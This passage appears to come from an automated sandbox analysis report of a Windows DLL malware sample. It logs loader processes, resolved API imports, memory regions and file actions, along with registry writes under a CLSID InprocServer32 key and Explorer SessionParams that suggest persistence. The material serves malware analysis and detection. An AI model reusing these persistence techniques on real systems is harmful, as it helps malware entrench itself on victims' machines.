| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | data = 127.0.0.1, size = 20, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 2, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, size = 88, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, size = 92, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue, size = 0, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97563 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #50: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #50 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS /fn_args="explorer.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcd4 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00447fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00620fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0077ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 97625 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #51: gorctexxzx.exe
150
0
| Information | Value |
|---|---|
| ID | #51 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT /fn_args="explorer.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xce0 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x002a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00550fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
